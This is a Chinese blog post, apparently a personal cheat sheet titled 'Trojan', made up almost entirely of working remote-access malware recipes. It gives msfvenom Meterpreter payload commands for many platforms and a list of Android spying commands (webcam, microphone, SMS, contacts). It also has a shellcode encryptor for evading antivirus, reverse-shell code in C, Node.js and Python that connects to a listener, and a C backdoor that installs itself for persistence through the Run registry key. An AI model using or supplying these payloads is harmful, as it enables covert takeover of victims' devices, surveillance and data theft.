Trojan

已于 2023-11-15 10:09:30 修改
阅读量1w 收藏
点赞数
分类专栏: Other web Windows 文章标签: php web安全 系统安全
于 2020-03-17 17:56:32 首次发布
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/104927352
版权
Windows 同时被 3 个专栏收录
16 篇文章 4 订阅
订阅专栏
web
14 篇文章 0 订阅
订阅专栏
Other
13 篇文章 0 订阅
订阅专栏

msfvenom

msfconsole

use exploit/multi/handler
set payload ****/meterpreter/reverse_tcp 
show options 
set LHOST=192.168.0.106
set LHOST 192.168.0.106
set LPORT 5555

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > ./shell.apk

help:

Stdapi: Webcam Commands
===================================
    webcam_list  列出网络摄像头
    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒
    webcam_chat  开始视频聊天
    webcam_snap  从指定的摄像头获取快照
    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]
Android Commands
=================
	activity_start  从URI字符串启动Android活动
	check_root  检查设备是否有根
	dump_calllog  获取调用日志
	dump_contacts  获取联系人列表
	dump_sms  获取短信
	geolocate  利用地理定位获取当前LAT
	wlan_geolocate  利用WLAN信息获取当前LAT
	hide_app_icon  从发射器隐藏应用程序图标
	interval_collect  管理区间收集能力
	send_sms  从目标会话发送短消息
	set_audio_mode
	sqlite_query  从存储库查询SQLite数据库
	wakelock  启用/禁用Wakelock

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe -o shell.exe

1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw

wget https://github.com/clinicallyinane/shellcode_launcher/blob/master/shellcode_launcher.exe
shellcode_launcher.exe -i shellcode.raw

2

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw

git clone https://github.com/Arno0x/ShellcodeWrapper
cd ShellcodeWrapper
python shellcode_encoder.py -cpp -cs -py shellcode.raw sir_123 xor

shellcode_encoder.py python3

#!/usr/bin/python3
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Modify: cc-sir
#

import argparse
from Crypto.Hash import MD5
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
from os import urandom
from string import Template
import os

templates = {
	'cpp': './templates/encryptedShellcodeWrapper.cpp',
	'csharp': './templates/encryptedShellcodeWrapper.cs',
	'python': './templates/encryptedShellcodeWrapper.py'
}

resultFiles = {
	'cpp': './result/encryptedShellcodeWrapper.cpp',
	'csharp': './result/encryptedShellcodeWrapper.cs',
	'python': './result/encryptedShellcodeWrapper.py'
}

# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = list(map(ord, key))
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#------------------------------------------------------------------------
def pad(s):
	"""PKCS7 padding"""
	return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)

#------------------------------------------------------------------------
def aesEncrypt(clearText, key):

	# Generate a crypto secure random Initialization Vector
	iv = urandom(AES.block_size)

	# Perform PKCS7 padding so that clearText is a multiple of the block size
	clearText = pad(clearText)

	cipher = AES.new(key, AES.MODE_CBC, iv)
	return iv + cipher.encrypt(bytes(clearText))

def convertFromTemplate(parameters, templateFile):
	try:
		with open(templateFile) as f:
			src = Template(f.read())
			result = src.substitute(parameters)
			f.close()
			return result
	except IOError:
		print (color("[!] Could not open or read template file [{}]".format(templateFile)))
		return None

def formatCPP(data, key, cipherType):
	shellcode = "\\x"
	shellcode += "\\x".join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['cpp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['cpp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['cpp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C++ code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C++ code  [{}]".format(fileName)))

# data as a bytearray
def formatCSharp(data, key, cipherType):
	shellcode = '0x'
	shellcode += ',0x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['csharp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['csharp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['csharp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C# code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C# code  [{}]".format(fileName)))

#------------------------------------------------------------------------
# data as a bytearray
def formatPy(data, key, cipherType):
	shellcode = '\\x'
	shellcode += '\\x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['python'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['python'])[0] + "_" + cipherType + os.path.splitext(resultFiles['python'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] Python code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write Python code  [{}]".format(fileName)))

# data as a bytearray
def formatB64(data):
	return b64encode(data)

def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Change text color for the Linux terminal.
    """
    
    attr = []
    # bold
    attr.append('1')
    
    if color:
        if color.lower() == "red":
            attr.append('31')
        elif color.lower() == "green":
            attr.append('32')
        elif color.lower() == "blue":
            attr.append('34')
        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)

    else:
        if string.strip().startswith("[!]"):
            attr.append('31')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[+]"):
            attr.append('32')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[?]"):
            attr.append('33')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[*]"):
            attr.append('34')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        else:
            return string

if __name__ == '__main__':
	#------------------------------------------------------------------------
	# Parse arguments
	parser = argparse.ArgumentParser()
	parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted")
	parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode")
	parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes'])
	parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true")
	parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true")
	parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true")
	parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true")
	args = parser.parse_args() 

	# Check that required directories and path are available, if not create them
	if not os.path.isdir("./result"):
		os.makedirs("./result")
		print (color("[+] Creating [./result] directory for resulting code files"))

	# Open shellcode file and read all bytes from it
	try:
		with open(args.shellcodeFile,"rb") as shellcodeFileHandle:
			shellcodeBytes = bytearray(shellcodeFileHandle.read())
			shellcodeFileHandle.close()
			print (color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile)))
	except IOError:
		print (color("[!] Could not open or read file [{}]".format(args.shellcodeFile)))
		quit()

	print (color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest())))
	print (color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes))))

	# Perform AES128 transformation
	if args.encryptionType == 'aes':
		# Derive a 16 bytes (128 bits) master key from the provided key
		key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16)
		masterKey = formatB64(key)
		print (color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey)))
		transformedShellcode = aesEncrypt(shellcodeBytes, key)
		cipherType = 'aes'

	# Perform XOR transformation
	elif args.encryptionType == 'xor':
		masterKey = args.key
		print (color("[*] XOR encoding the shellcode with key [{}]".format(masterKey)))
		transformedShellcode = xor(shellcodeBytes, masterKey)
		cipherType = 'xor'

	# Display interim results
	print ("\n==================================== RESULT ====================================\n")
	print (color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode))))

	# Display formated output
	if args.base64:
		print (color("[*] Transformed shellcode as a base64 encoded string"))		
		print (formatB64(transformedShellcode))
		print ("")
	
	if args.cplusplus:
		print (color("[*] Generating C++ code file"))
		formatCPP(transformedShellcode, masterKey, cipherType)
		print ("")
		

	if args.csharp:
		print (color("[*] Generating C# code file"))
		formatCSharp(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.python:
		print (color("[*] Generating Python code file"))
		formatPy(transformedShellcode, masterKey, cipherType)
		print ("")

3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f c -o msf.txt

code:

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

wget https://github.com/DimopoulosElias/SimpleShellcodeInjector/raw/master/SimpleShellcodeInjector.c
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
ssi.exe code

ssi

反向链接

c/c++

//#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

int _tmain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR LpszCmdLine,int nCmdShow)
{
	WSADATA wd;
	SOCKET sock;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	struct sockaddr_in sin;
	char IP[16]="172.16.217.1\x00"; //ip
	unsigned short port=1234; // port
	memset(&si,0,sizeof(si));
	WSAStartup(MAKEWORD(1,1),&wd);
	sock = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.s_addr = inet_addr(IP);

	connect(sock,(struct sockaddr*)&sin,sizeof(sin));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi);
	return 0;
}

node.js

var ip = '192.168.56.1';
var port = 1234;
var uuid = '53AC6D78-0F97-1895-967C-D0ECA5041A8C';
(function () {
    var os = require('os');
    var fs = require('fs');
    var net = require('net');
    var cp = require('child_process');
    var osarch = os.platform();
    if (osarch == 'win32') {
        fs.writeFile('C:\\Windows\\Temp\\uuid', uuid, 'utf8', function (error) { });
        var sh = cp.spawn('cmd', [],);
    } else {
        fs.writeFile('/tmp/uuid', uuid, 'utf8', function (error) { });
        var sh = cp.spawn('/bin/bash', []);
    }
    var client = new net.Socket();
    client.connect(port, ip, function () {
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

主动链接

//#include "stdafx.h"
#include <winsock2.h>
#include <Windows.h>
#include <string.h>
#pragma comment(lib,"ws2_32.lib")
#define MasterPort 999
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 
//windows控制台程序不出黑窗口
int add_reg(){ //添加自启动
	char regname[] = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
	//"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	HKEY hkResult;
	int ret;
	ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
	//ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regname, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkResult);
	ret = RegSetValueEx(hkResult,"MiniMuma",0,REG_EXPAND_SZ,(unsigned char *)"C:\\Windows\\MiniMuma.exe",25);
	
	char modlepath[256];
	char syspath[256];
	GetModuleFileName(0,modlepath,256); //获得程序名字
	ret = CopyFile(modlepath,strcat(syspath,"C:\\Windows\\MiniMuma.exe"),1);
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	char szCMDPath[255];
	char Pass[256];
	add_reg();
	while(1){
		ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
		ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
		ZeroMemory(&WSADa,sizeof(WSADATA));
		ZeroMemory(&Pass,sizeof(Pass));

		GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
		WSAStartup(0x0202,&WSADa);
	
		SockAddrIn.sin_family = AF_INET;
		SockAddrIn.sin_addr.s_addr = INADDR_ANY;
		SockAddrIn.sin_port = htons(MasterPort);
		CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

		bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

		listen(CSocket,1);
		iAddrSize = sizeof(SockAddrIn);
		SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
		StartupInfo.cb = sizeof(STARTUPINFO);
		StartupInfo.wShowWindow = SW_HIDE;
		StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
		StartupInfo.hStdError = (HANDLE)SSocket;
		StartupInfo.hStdInput = (HANDLE)SSocket;
		StartupInfo.hStdOutput = (HANDLE)SSocket;
		int ret,ret2;
		recv(SSocket,Pass,256,0);
		ret = strcmp(Pass,"cc_sir\n");	//Passwd
		ret2 = strcmp(Pass,"quite\n");	//quite
		
		if(ret == 0){
			CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
			WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
			CloseHandle(ProcessInfo.hProcess);
			CloseHandle(ProcessInfo.hThread);

			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
		else if(ret2 == 0){
			send(SSocket,"MiniMuma quite!\n",sizeof("MiniMuma quite!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
			break;
		}
		else{
			send(SSocket,"Passwd is Error!\n",sizeof("Passwd is Error!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
	}
	return 0;
}

python

python3 Windows反弹shell:

import os
import socket
import subprocess
import threading
import sys

def s2p(s, p):
    while True:
        p.stdin.write(s.recv(1024).decode())
        p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1).encode())

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try:
        s.connect(("192.168.56.1", 1234))
        break
    except:
        pass

p = subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE,
                    stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)

threading.Thread(target=s2p, args=[s, p], daemon=True).start()
threading.Thread(target=p2s, args=[s, p], daemon=True).start()

try:
    p.wait()
except:
    s.close()
    sys.exit(0)

import os
import socket
import subprocess
HOST = '192.168.56.1'
PORT = 1234

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(str.encode("[*] Connection Established!\n"))

while 1:
    try:
        s.send(str.encode(os.getcwd() + "> "))
        data = s.recv(1024).decode("UTF-8")
        data = data.strip('\n')
        if data == "exit" or data == "quit":
            break
        if data[:2] == "cd":
            os.chdir(data[3:])
        if len(data) > 0:
            print("data: " + data)
            proc = subprocess.Popen(["cmd", "/c", data], shell=True,
                                    stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            stdout_value = proc.stdout.read() + proc.stderr.read()
            output_str = str(stdout_value, "UTF-8")
            s.send(str.encode("\n" + output_str))
    except Exception as e:
        continue

s.close()

python2和python3都可以:

import select
import socket
import subprocess
try:
    shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    shell.connect(("192.168.56.1", 1234))
except Exception as reason:
    print ('[-] Failed to Create Socket : %s' %reason)
    exit(0)
rlist = [shell]
wlist = []
elist = [shell]
while True:
    shell.send(b"cmd:")
    rs, ws,es = select.select(rlist,wlist,wlist)
    for sockfd in rs:
        if sockfd == shell:
            command = shell.recv(1024)
            if command == 'exit\n' or command == b'exit\n':
                shell.close()
                exit(0)
            result, error = subprocess.Popen(
                ["cmd", "/c", command], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
            shell.sendall(result)

other

# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f elf > shell.elf
# Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f exe > shell.exe
msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f num
# Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f macho > shell.machoWeb
# PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f raw > shell.php
# ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f asp > shell.asp
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f raw > shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.102 LPORT=4444  -f war > shell.war
# Python
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.102 LPORT=4444  -f raw > shell.py
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.102 LPORT=4444  -f raw > shell.sh
# Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.102  LPORT=4444  -f raw > shell.pl
# C
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102  LPORT=4444 -f c > shellcode.c  
# C#
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f csharp > shellcode.txt
钞sir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Trojan for Mac
04-02
Trojan for Mac 支持 macOS Catalina 10.15.3 最好用的 Mac Trojan 客户端.
trojan客户端最新版
03-27
最新的trojan客户端,最近刚接触到一个很好的应用Igniter,界面及其简介,搭配Trojan非常强大。作为一个完美主义者,总希望软件UI能更好看些,动手吧。
trojan变种分析
04-16
trojan变种分析
trojan:Trojan 安装教程:
04-09
trojan 一键安装脚本 安装教程:
trojan:trojan多用户管理部署程序,支持网站页面管理
03-21
木马 trojan多用户管理部署程序 功能 在线网站页面和命令行两种方式管理trojan多用户 启动/停止/重启trojan服务端 支持流量统计和流量限制 命令行模式管理,支持命令补全 集成acme.sh证书申请 生成客户端配置文件 在线实时查看trojan日志 在线trojan和trojan-go随时切换 支持trojan://分享链接和二维码分享(二维码唯一网页页面) 限制用户使用期限 安装方式 trojan使用请提前准备好服务器可用的域名 一种。一键脚本安装 #安装/更新 source <(curl -sL https://git.io/trojan-install) #卸载 source <(curl -sL https://git.io/trojan-install) --remove 安装完后输入'木马'可进入管理程序浏览器访问柯林斯用英语网站页面管理木马用户前端页面源码地址
trojan-py:trojan的python订阅地址
02-13
配置方式 修改config.py中的参数 suburl = "" # 订阅地址 mail_user = "" #qq邮箱用户名 mail_pass = "" #qq邮箱口令,需要开启SMTP服务 sender = '' # 发送人 receivers = [ '' ] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱 运行 python3 trojan.py 在命令行中运行,会生成trojan_record.json文件,文件里面保存了从订阅地址中解析所有连接地址。
Trojan客户端使用教程
heroguo007的专栏
03-30 7066
此教程使用的是 Centos7 x86_64系统。
强烈推荐:Trojan多用户管理部署程序
weixin_42662753的博客
07-20 1140
强烈推荐:Trojan多用户管理部署程序
推荐开源项目:Trojan-Web - 安全、高效的网络访问解决方案
最新发布
gitblog_00012的博客
03-28 352
推荐开源项目:Trojan-Web - 安全、高效的网络访问解决方案 项目地址:https://gitcode.com/Jrohy/trojan-web Trojan-Web 是一个强大的、基于Go语言编写的代理服务器,它扩展了原始的Trojan Project的功能,增加了对网页版配置和管理的支持。这个项目旨在提供一个安全、隐蔽且快速的网络访问工具,同时也注重用户体验和易用性。 技术分析 1. ...
Trojan协议流量分析
ch3cke的博客
02-18 1万+
原理解析 如图所示,Trojan工作在443端口,处理来自外界的HTTPS请求,如果是合法的Trojan请求,那么为该请求提供服务,否则就将该流量转发给web。服务器Nginx,由Nginx为其提供服务。基于这个工作工程可以知道,Trojan的一切表现均与Nginx一致,不会引入额外特征,从而达到无法识别的效果。当然,为了防止恶意探测,我们需要将80端口的流量全部重定向到443端口,并且服务器只...
trojan-qt5.tar.gz
04-09
trojan-qt5 for linux
安卓trogan客户端 igniter.apk
03-13
安卓trogan客户端 igniter.apk
trojan-qt5.app.zip
04-06
trojan-qt5.app.zip
cmd一句命令打开3389端口
热门推荐
钞sir的博客
12-02 3万+
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 在xp,win7等系统上亲测有效,在渗透测试中非常方便。。。。
C语言获取任意Windows程序模块基地址
钞sir的博客
06-04 2万+
我已无力接住你,再也不能抗风雨 函数 这里主要用到的函数是EnumProcessModulesEx: BOOL EnumProcessModulesEx( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag ); hProcess表示处理的句柄; lphModule表示接收模块句柄列表的数组; cb表示lphModule数组的大小,以字节为单位; lpc.
Windows内存dump
钞sir的博客
04-30 1万+
天地之间,物各有主…
通过C++调用Com接口
钞sir的博客
10-24 1万+
难忘当时暮朝朝, 风又飘来雨潇潇
Unmanaged PowerShell
钞sir的博客
03-10 1万+
三伏天在外面跑一圈 说跑起来有风
Cobalt Strike远控木马分析
钞sir的博客
10-21 1万+
简介 Cobalt Strike目前已经很流行, 其生成的木马在很多地方也可以找到, 这里通过网上发布的一个aqy的免广告的工具中带的木马进行分析学习… 过程 找到可疑文件 这里通过Exeinfo.exe工具, 发现可疑DLL, 文件被vmp 2.07加了壳, 很明显一般的dll不会加这种壳: 行为分析 通过OD我们进行调试, 发现此dll的主要功能是调用当前目录下的powershell脚本dataup.ps1: 查看此dataup.ps1, 代码如下: sal a New-Object;Add-Typ
trojan shell
09-22
引用: Trojan Shell 是一种特定类型的木马程序,它具有隐藏和潜伏的特点。它通常以一个合法程序的形式出现,但在内部隐藏着恶意代码。一旦被激活,Trojan Shell 就会在受感染的系统中创建一个后门,使黑客能够非法地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值